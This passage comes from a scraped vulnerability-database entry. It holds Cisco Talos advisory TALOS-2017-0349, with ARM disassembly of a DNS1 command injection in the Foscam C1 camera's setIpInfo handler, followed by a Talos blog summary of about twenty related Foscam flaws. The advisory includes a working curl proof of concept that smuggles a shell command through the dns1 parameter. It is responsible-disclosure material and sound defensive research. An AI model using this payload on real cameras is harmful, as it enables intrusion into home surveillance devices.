the function, the parameters [10] for \"callbackJson\", \"isDHCP\", \"ip\", \"gate\", \"mask\", \"dns1\", \"dns2\" are extracted from the query. Afterwards, the \"isDHCP\" value [11] is checked against 0 and if it is, the the \"ip\" and \"mask\" parameter values are passed to the function `sub_3FE28` [12] to be parsed using `inet_addr`: 0 is returned if parameters are correctly parsed, -1 otherwise. The return value is passed via IPC via code 0x3001 [13], which is handled by the binary \"CGIProxy.fcgi\" and takes care of returning the error code as result of the operation. Regardless the \"ip\" and \"mask\" parameters were parsed correctly or not, the execution will continue and another message is sent with code 0x601d via IPC [14].\n \n \n .text:0003FF30 setIpInfo_37f30\n .text:0003FF30\n .text:0003FF30 F0 40 2D E9 STMFD SP!, {R4-R7,LR}\n ...\n .text:0003FF54 38 11 9F E5 LDR R1, =str.callbackJson\n .text:0003FF58 BA A0 FF EB BL extract_param ; [10]\n ...\n .text:0003FF60 30 11 9F E5 LDR R1, =str.isDHCP\n ...\n .text:0003FF68 B6 A0 FF EB BL extract_param ; [10]\n ...\n .text:0003FF7C 18 11 9F E5 LDR R1, =str.ip\n ...\n .text:0003FF98 AA A0 FF EB BL extract_param ; [10]\n ...\n .text:0003FFA0 F8 10 9F E5 LDR R1, =str.gate\n ...\n .text:0003FFAC A5 A0 FF EB BL extract_param ; [10]\n .text:0003FFB0 EC 10 9F E5 LDR R1, =str.mask\n ...\n .text:0003FFBC A1 A0 FF EB BL extract_param ; [10]\n .text:0003FFC0 E0 10 9F E5 LDR R1, =str.dns1\n ...\n .text:0003FFCC 9D A0 FF EB BL extract_param ; [10]\n ...\n .text:0003FFD4 D0 10 9F E5 LDR R1, =str.dns2\n ...\n .text:0003FFDC 99 A0 FF EB BL extract_param ; [10]\n .text:0003FFE0 1C 34 DD E5 LDRB R3, [SP,#0x4E0+var_C4] ; [11]\n .text:0003FFE4 00 00 53 E3 CMP R3, #0\n .text:0003FFE8 05 00 00 1A BNE loc_40004\n .text:0003FFEC 07 00 A0 E1 MOV R0, R7 ; \"ip\" value\n .text:0003FFF0 06 10 A0 E1 MOV R1, R6 ; \"mask\" value\n .text:0003FFF4 8B FF FF EB BL sub_3FE28 ; [12]\n .text:0003FFF8 00 00 50 E3 CMP R0, #0\n .text:0003FFFC 00 20 E0 13 MOVNE R2, #0xFFFFFFFF\n .text:00040000 00 00 00 1A BNE loc_40008\n .text:00040004\n .text:00040004 loc_40004\n .text:00040004 00 20 A0 E3 MOV R2, #0\n .text:00040008\n .text:00040008 loc_40008\n ...\n .text:00040034 7C 10 9F E5 LDR R1, =0x3001 ; [13]\n ...\n .text:00040050 81 4A FF EB BL CMsgClient::sendMsg()\n ...\n .text:00040068 54 10 9F E5 LDR R1, =0x601D ; [14]\n ...\n .text:00040084 74 4A FF EB BL CMsgClient::sendMsg()\n ...\n .text:00040090 F0 80 BD E8 LDMFD SP!, {R4-R7,PC}\n \n\nCode 0x601d is handled in the \"devMng\" binary by the function `OnDevMngMsgSetIpInfo_120ac`. The function extracts \"isDHCP\", ip\", \"mask\", \"gate\", \"dns1\" and \"dns2\" parameters from the IPC call and passes them to the function `sub_3D880` [15]. This function checks a global variable for the state of the operation. In this first call, the branch is not taken and the function will only call `sub_37ED8` [17], which saves all the parameters in \"/mnt/mtd/app/config/NetworkConfig.bin\". Parameters are also saved in a global structure, to allow access from concurring threads. If no errors are returned, `OnDevMngMsgSetIpInfo_120ac` will call `sub_3AAE4` [19] by passing the pointer to a global structure [18]. The purpose of this function is to flag the completion of the interfaces configuration by putting \"1\" into the structure, at 0x8822c [20].\n \n \n .text:0001A0AC OnDevMngMsgSetIpInfo_120ac\n .text:0001A0AC\n .text:0001A0AC 70 40 2D E9 STMFD SP!, {R4-R6,LR}\n ...\n .text:0001A140 CE 8D 00 EB BL sub_3D880 ; [15]\n \n \n .text:0003D880 sub_3D880\n .text:0003D880\n .text:0003D880 F0 45 2D E9 STMFD SP!, {R4-R8,R10,LR}\n ...\n .text:0003D898 00 20 D2 E5 LDRB R2, [R2] ; [16]\n .text:0003D89C 1A 00 00 0A BEQ loc_3D90C\n .text:0003D8A0 00 00 52 E3 CMP R2, #0\n ...\n .text:0003D8BC 05 10 A0 E1 MOV R1, R5\n .text:0003D8C0 04 30 D1 E4 LDRB R3, [R1],#4\n .text:0003D8C4 10 30 C4 E5 STRB R3, [R4,#0x10]\n .text:0003D8C8 14 00 84 E2 ADD R0, R4, #0x14\n .text:0003D8CC 9E 52 FF EB BL std::string::operator=(std::string const&)\n .text:0003D8D0 08 10 85 E2 ADD R1, R5, #8\n .text:0003D8D4 18 00 84 E2 ADD R0, R4, #0x18\n .text:0003D8D8 9B 52 FF EB BL std::string::operator=(std::string const&)\n .text:0003D8DC 0C 10 85 E2 ADD R1, R5, #0xC\n .text:0003D8E0 1C 00 84 E2 ADD R0, R4, #0x1C\n .text:0003D8E4 98 52 FF EB BL std::string::operator=(std::string const&)\n .text:0003D8E8 10 10 85 E2 ADD R1, R5, #0x10\n .text:0003D8EC 20 00 84 E2 ADD R0, R4, #0x20\n .text:0003D8F0 95 52 FF EB BL std::string::operator=(std::string const&)\n .text:0003D8F4 24 00 84 E2 ADD R0, R4, #0x24\n .text:0003D8F8 14 10 85 E2 ADD R1, R5, #0x14\n .text:0003D8FC 92 52 FF EB BL std::string::operator=(std::string const&)\n .text:0003D900 10 00 84 E2 ADD R0, R4, #0x10\n .text:0003D904 73 E9 FF EB BL sub_37ED8 ; [17]\n ...\n .text:0003E078 F0 85 BD E8 LDMFD SP!, {R4-R8,R10,PC}\n \n ... OnDevMngMsgSetIpInfo_120ac\n ...\n .text:0001A144 01 00 70 E3 CMN R0, #1\n .text:0001A148 04 00 00 0A BEQ loc_1A160\n .text:0001A14C 54 00 9F E5 LDR R0, =dword_85D88 ; [18]\n ...\n .text:0001A15C 60 82 00 EB BL sub_3AAE4 ; [19]\n \n .text:0003AAE4 sub_3AAE4\n ...\n .text:0003AB08 00 40 A0 E1 MOV R4, R0\n ...\n .text:0003ABCC 34 30 9F E5 LDR R3, =0x24A4\n .text:0003ABD0 01 20 A0 E3 MOV R2, #1\n .text:0003ABD4 03 20 C4 E7 STRB R2, [R4,R3] ; [20]\n \n\nThe application creates 13 threads in total at startup. One of them is continuously polling for network changes: `sub_42DE0`. Two functions are called in a loop: one for softAP configuration [21] and one for wifi and ethernet connections [22]. We will explore the latter.\n \n \n .text:00042DE0 sub_42DE0\n .text:00042DE0\n .text:00042DE0 38 40 2D E9 STMFD SP!, {R3-R5,LR}\n .text:00042DE4 00 40 A0 E1 MOV R4, R0\n .text:00042DE8 06 50 A0 E3 MOV R5, #6\n .text:00042DEC\n .text:00042DEC loc_42DEC\n .text:00042DEC 05 10 A0 E1 MOV R1, R5\n .text:00042DF0 04 00 A0 E1 MOV R0, R4\n .text:00042DF4 68 E6 FF EB BL sub_3C79C ; [21]\n .text:00042DF8 00 10 A0 E1 MOV R1, R0\n .text:00042DFC 04 00 A0 E1 MOV R0, R4\n .text:00042E00 BE FE FF EB BL sub_42900 ; [22]\n .text:00042E04 00 50 A0 E1 MOV R5, R0\n .text:00042E08 04 00 9F E5 LDR R0, =0xF4240\n .text:00042E0C 51 3D FF EB BL usleep\n .text:00042E10 F5 FF FF EA B loc_42DEC ; loop\n \n\n`sub_42900` is the function that actually checks for the value of the global variable at 0x8822c [23]. As soon as its value is not 0, the function `sub_428E0` is called.\n \n \n .text:00042D4C 88 30 9F E5 LDR R3, =0x24A4\n .text:00042D50 03 20 D4 E7 LDRB R2, [R4,R3] ; [23]\n .text:00042D54 00 00 52 E3 CMP R2, #0\n .text:00042D58 04 00 00 0A BEQ loc_42D70\n .text:00042D5C 00 20 A0 E3 MOV R2, #0\n .text:00042D60 03 20 C4 E7 STRB R2, [R4,R3]\n .text:00042D64 04 00 A0 E1 MOV R0, R4\n .text:00042D68 05 10 A0 E1 MOV R1, R5\n .text:00042D6C DB FE FF EB BL sub_428E0\n \n\nAt this point the execution will continue with many different calls, from a higher level perspective the following is the path that will be taken, stripped to only interesting the stubs (capital names are user-controlled strings):\n \n \n ```\n sub_428E0\n sub_3FB2C\n sub_3B94C\n system(\"ifconfig eth0 0.0.0.0\")\n system(\"ifconfig ra0 up\")\n sub_3B8F0\n sub_3A95C\n system(\"rm -rf /var/run/wpa_supplicant\")\n system(\"ifconfig ra0 down\")\n system(\"killall wpa_supplicant\")\n sub_3B804\n system(\"ifconfig ra0 up\")\n sub_4286C\n sub_3E164\n system(\"ifconfig ra0 0.0.0.0\")\n system(\"ifconfig ra0 down\")\n sub_3D880\n system(\"killall udhcpc\")\n fork()\n child: execlp(\"ifconfig\", \"ifconfig\", \"eth0\", IP, \"netmask\", NETMASK)\n fork()\n child: execlp(\"sh\", \"sh\", \"-c\", \"route del default dev eth0\")\n fork()\n child: execlp(\"sh\", \"sh\", \"-c\", \"route add default gw GATEWAY dev eth0\")\n fork()\n child: execlp(\"sh\", \"sh\", \"-c\", \"echo nameserver DNS1 > /etc/resolv.conf\")\n fork()\n child: execlp(\"sh\", \"sh\", \"-c\", \"echo nameserver DNS2 >> /etc/resolv.conf\")\n system(\"killall -9 OnvifAgent\")\n ```\n \n\nFunction `sub_3E164` fetches the parameters from a global structure and passes them to `sub_3D880`. Function `sub_3D880` was already called before, but this time the global state is different. The function thus takes a different branch and the actual interface configuration takes place. User-supplied parameters are taken unmodified from a global structure. In this function the dns1 parameter [24] is never sanitized and used in a `sprintf` [25] call to build the final command that will be passed to `execlp` [26].\n \n \n .text:0003DF90 B4 11 9F E5 LDR R1, =str.echonameservers1 ; \"echo nameserver %s > /etc/resolv.conf\"\n .text:0003DF94 10 20 95 E5 LDR R2, [R5,#0x10] ; [24]\n .text:0003DF98 04 00 A0 E1 MOV R0, R4\n .text:0003DF9C 66 53 FF EB BL sprintf ; [25]\n .text:0003DFA0 A4 53 FF EB BL fork\n .text:0003DFA4 00 30 50 E2 SUBS R3, R0, #0\n .text:0003DFA8 0C 00 00 1A BNE loc_3DFE0\n .text:0003DFAC 88 01 9F E5 LDR R0, =str.sh ; \"sh\"\n .text:0003DFB0 00 30 8D E5 STR R3, [SP,#0xD8+var_D8]\n .text:0003DFB4 00 10 A0 E1 MOV R1, R0\n .text:0003DFB8 80 21 9F E5 LDR R2, =str._c ; \"-c\"\n .text:0003DFBC 04 30 A0 E1 MOV R3, R4 ; [26]\n .text:0003DFC0 CC 53 FF EB BL execlp\n \n\n### Exploit Proof-of-Concept\n\nThis vulnerability is reachable by the \"setIpInfo\" command and requires a valid user account with administrator privileges. The following proof of concept shows how to execute an arbitrary command.\n \n \n ```\n $ sUsr=\"admin\"\n $ sPwd=\"\"\n $ sIP=192.168.0.20\n $ sMask=255.255.255.0\n $ sGW=192.168.0.1\n $ sDns1=1.1.1.1\n $ sDns2=2.2.2.2\n $ sCmd=`perl -MURI::Escape -e 'print uri_escape(\";id>/tmp/www/inj;\")'`\n $ curl \"http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=guest&pwd=asd0--&cmd=setIpInfo&isDHCP=0&ip=${sIP}&mask=${sMask}&gate=${sGW}&dns1=${sDns1}${sCmd}&dns2=${sDns2}\"\n ```\n \n\n### Timeline\n\n2017-05-30 - Vendor Disclosure \n2017-06-19 - Public Release\n\n##### Credit\n\nDiscovered by Claudio Bozzato of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2017-0350\n\nPrevious Report\n\nTALOS-2017-0348\n", "edition": 10, "reporter": "Talos Intelligence", "published": "2017-06-19T00:00:00", "title": "Foscam IP Video Camera CGIProxy.fcgi DNS1 Address Configuration Command Injection Vulnerability", "type": "talos", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2017-2847"], "modified": "2017-06-19T00:00:00", "id": "TALOS-2017-0349", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0349", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "talosblog": [{"lastseen": "2017-07-29T13:22:40", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "enchantments_done": [], "description": "<h2 id=\"h.4x9n64h9k27j\">Executive Summary</h2>The Foscam C1 is a webcam that is marketed for use in a variety of applications including home security monitoring. As an indoor webcam, it is designed to be set up inside of a building and features the ability to be accessed remotely via a web interface or from within a mobile application. Talos recently identified several vulnerabilities in the Foscam C1 camera that could be used by attackers for a variety of purposes including access and retrieval of sensitive information stored on the camera, execution of arbitrary commands within the camera's operating system, and in several cases, completely compromise the device. As these cameras are commonly deployed in sensitive locations and used as baby monitors, security cameras, etc. it is recommended that affected devices be updated as quickly as possible to ensure that they are no longer vulnerable.<br /><br />In accordance with our responsible disclosure policy, Talos has worked with Foscam to resolve these issues, which has resulted in the release of a firmware update addressing them.<br /><br /><h2 id=\"h.om6cexyys78v\">Vulnerability Details</h2><div><a name='more'></a><br /></div><b>Foscam C1 Webcam FTP Hard Coded Password Vulnerability (TALOS-2016-0245 / CVE-2016-8731)</b><br /><br /><i>Vulnerability Discovered by Richard Harman and Dave McDaniel of Talos</i><br /><br />Talos recently discovered that Foscam C1 Indoor HD Cameras contain undocumented, hardcoded FTP credentials that could allow an attacker the ability to remotely login to affected devices and gain full read and write access to the Micro-SD card mounted within the device. This access could be used to obtain sensitive information such as audio and video recordings, images, and other data stored on the Micro-SD card. This vulnerability, TALOS-2016-0245 has been assigned CVE-2016-8731. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2016-0245/\">here</a>.<br /><br /><b>Foscam IP Video Camera WebService CGI Parameter Code Execution Vulnerability (TALOS-2017-0299 / CVE-2017-2805)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a stack based buffer overflow in the \"CGIProxy.fcgi\" service of the web management interface. An attacker could use a specially crafted HTTP request to trigger this overflow condition. This vulnerability could be leveraged by an attacker to achieve code execution on vulnerable devices. This vulnerability, TALOS-2017-0299 has been assigned CVE-2017-2805. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0299/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Account Creation Command Injection Vulnerability (TALOS-2017-0328 / CVE-2017-2827)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service of the web management interface. An attacker could insert arbitrary characters into the \"addAccount\" command via either the \"usrName\" or \"usrPwd\" parameters, resulting in execution of arbitrary OS commands. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. This vulnerability, TALOS-2017-0328 has been assigned CVE-2017-2827. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0328/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Account Password Command Injection Vulnerability (TALOS-2017-0329 / CVE-2017-2828)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service of the web management interface. An attacker could insert arbitrary characters into the \"changePassword\" command during the account password change process, resulting in execution of arbitrary OS commands. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. TALOS-2017-0329 has been assigned CVE-2017-2828. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0329/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Message 0x3001 Directory Traversal Vulnerability (TALOS-2017-0330 / CVE-2017-2829)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a directory traversal vulnerability present in the \"CGIProxy.fcgi\" service of the web management interface. This vulnerability could allow an attacker to retrieve arbitrary files from the camera using an HTTP request. This could result in the disclosure of sensitive information. This vulnerability is due to a failure to adequately sanitize user input and could allow an attacker to traverse outside of the intended directory structure of the web interface. TALOS-2017-0330 has been assigned CVE-2017-2829. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0330/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Message 0x3001 Multi-part Form Boundary Code Execution Vulnerability (TALOS-2017-0331 / CVE-2017-2830)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a buffer overflow vulnerability present in the \"CGIProxy.fcgi\" service of the web management interface. Exploitation of this vulnerability could result in the execution of arbitrary code on affected devices. An attacker could trigger this vulnerability using a specially crafted HTTP request to overwrite the buffer on the stack and ultimately obtain control over code execution flow within the device. This vulnerability is due to a failure of the device to perform proper bounds checking on input received from users. TALOS-2017-0331 has been assigned CVE-2017-2830. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0331/\">here</a>. <br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Query Append Code Execution Vulnerability (TALOS-2017-0332 / CVE-2017-2831)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a buffer overflow vulnerability present in the \"FCGX_Init\" function within the \"CGIProxy.fcgi\" service of the web management interface. An attacker could leverage this vulnerability to obtain remote code execution on affected devices. This vulnerability could be triggered using a specially crafted HTTP request and allow an attacker to overwrite the buffer or obtain control over code execution flow within affected devices. TALOS-2017-0332 has been assigned CVE-2017-2831. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0332/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi FTP Startup Configuration Command Injection Vulnerability (TALOS-2017-0334 / CVE-2017-2833)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present within the \"webService\" application that is launched by the device during the bootup process. An attacker could leverage this vulnerability to execute operating system commands on the device during device startup. This vulnerability can be exploited using any command that allows for changing an account password (e.g. changePassword). During startup the FTP service is configured using shell commands without sanitizing the password parameter, resulting in execution of the attacker supplied commands. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. The injected command would then be executed once the device reboots. TALOS-2017-0334 has been assigned CVE-2017-2833. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0334/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Account Deletion Command Injection Vulnerability (TALOS-2017-0335 / CVE-2017-2832)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands during the Account Deletion process within the web interface. An attacker could exploit this vulnerability using a specially crafted HTTP request. The vulnerability is triggered when the \"delAccount\" command is invoked. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. TALOS-2017-0335 has been assigned CVE-2017-2832. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0335/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi SMTP Test Host Parameter Configuration Command Injection Vulnerability (TALOS-2017-0343 / CVE-2017-2841)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the \"msmtprc\" configuration file on the device, resulting in execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the \"smtpTest\" command and injecting commands into the \"SMTP Test Host\" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0343 has been assigned CVE-2017-2841. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0343/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi SMTP Test User Parameter Configuration Command Injection Vulnerability (TALOS-2017-0344 / CVE-2017-2842)</b><br /><i><br /></i><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the \"msmtprc\" configuration file on the device, resulting in the execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the \"smtpTest\" command and injecting commands into the \"SMTP Test User\" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0344 has been assigned CVE-2017-2842. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0344/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi SMTP Test Password Parameter Configuration Command Injection Vulnerability (TALOS-2017-0345 / CVE-2017-2843)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the \"msmtprc\" configuration file on the device, resulting in the execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the \"smtpTest\" command and injecting commands into the \"SMTP Test Password\" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0345 has been assigned CVE-2017-2843. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0345/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi SMTP Test Sender Parameter Configuration Command Injection Vulnerability (TALOS-2017-0346 / CVE-2017-2844)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the \"msmtprc\" configuration file on the device, resulting in the execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the \"smtpTest\" command and injecting commands into the \"SMTP Test Sender\" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0346 has been assigned CVE-2017-3844. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0346/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi SMTP Test Command Injection Vulnerability (TALOS-2017-0347 / CVE-2017-2845)</b><br /><br /><i>Vulnerability Discovered by Cory Duplantis and Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands during the SMTP configuration testing process. This vulnerability can be reached by invoking the \"smtpTest\" command and injecting attacker specified operating system commands. A specially crafted HTTP request can be used to exploit this vulnerability. This vulnerability requires an attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0347 has been assigned CVE-2017-2845. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0347/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Gateway Address Configuration Command Injection Vulnerability (TALOS-2017-0348 / CVE-2017-2846)</b><br /><i><br /></i><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with manual networking configuration. This vulnerability can be reached by invoking the \"setIpInfo\" command and injecting commands into the \"Gateway Address\" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0348 has been assigned CVE-2017-2846. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0348/\">here</a>.<br /><b><br /></b><b>Foscam IP Video Camera CGIProxy.fcgi DNS1 Address Configuration Command Injection Vulnerability (TALOS-2017-0349 / CVE-2017-2847)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with manual networking configuration. This vulnerability can be reached by invoking the \"setIpInfo\" command and injecting commands into the \"DNS1\" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0349 has been assigned CVE-2017-2847. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0349/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi DNS2 Address Configuration Command Injection Vulnerability (TALOS-2017-0350 / CVE-2017-2848)</b><br /><i><br /></i><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with manual networking configuration. This vulnerability can be reached by invoking the \"setIpInfo\" command and injecting commands into the \"DNS2\" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0350 has been assigned CVE-2017-2848. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0350/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi NTP Server Configuration Command Injection Vulnerability (TALOS-2017-0351 / CVE-2017-2849)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with NTP server address configuration. This vulnerability can be reached by invoking the \"setSystemTime\" command and injecting commands into the \"ntpServer\" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0351 has been assigned CVE-2017-2849. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0351/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Change Username pureftpd.passwd Injection Vulnerability (TALOS-2017-0352 / CVE-2017-2850)</b><br /><br /><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to an injection vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the \"pureftpd.passwd\" configuration file on the device during a username change operation, enabling the attacker to break out of the chroot environment associated with the FTP service on the device. This vulnerability could be used to escalate privileges on affected devices. This vulnerability is reachable by invoking the \"changeUserName\" command and requires an attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0352 has been assigned CVE-2017-2850. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0352/\">here</a>.<br /><br /><b>Foscam IP Video Camera CGIProxy.fcgi Wifi Settings Code Execution Vulnerability (TALOS-2017-0353 / CVE-2017-2851)</b><br /><i><br /></i><i>Vulnerability Discovered by Claudio Bozzato of Cisco Talos.</i><br /><br />Foscam C1 Indoor HD Cameras are vulnerable to a stack based buffer overflow vulnerability present in the \"CGIProxy.fcgi\" service within the web management interface on affected devices. This vulnerability can be exploited using a specially crafted HTTP request during the WiFi configuration on the device. This vulnerability could allow an attacker to overwrite the buffer and potentially lead to remote code execution on affected devices. This vulnerability is reachable by invoking the \"setWifiSetting\" command. Exploitation of this vulnerability requires an attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0353 has been assigned CVE-2017-2851. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0353/\">here</a>.<br /><br /><h2 id=\"h.7lv692mu22vr\">Versions Tested</h2>Talos has tested and confirmed that the following Foscam firmware versions are affected:<br /><br />Foscam, Inc. Indoor IP Camera C1 Series<br />System Firmware Version: 1.9.3.17<br />Application Firmware Version: 2.52.2.37<br />Web Version: 2.0.1.1<br />Plug-In Version: 3.3.0.5<br /><br /><h2 id=\"h.20my9pwfiqmo\">Conclusion</h2>One of the most commonly deployed IP cameras is the Foscam C1. In many cases these devices may be deployed in sensitive locations. They are marketed for use in security monitoring and many use these devices to monitor their homes, children, and pets remotely. As such, it is highly recommended that the firmware running on these devices be kept up-to-date to ensure the integrity of the devices, as well as the confidentiality of the information and environments that they are monitoring. Foscam has released a firmware update, version <a href=\"http://www.foscam.com/downloads/firmware_details.html?id=1\">V-2.x.2.43</a> to resolve these issues. Users of the affected devices should update to this new version as quickly as is operationally feasible to ensure that their devices are not vulnerable.<br /><br /><h2 id=\"h.halfffbm6urf\">Coverage</h2>The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.<br /><br />Snort Rules:<br />40908-40909<br />42078<br 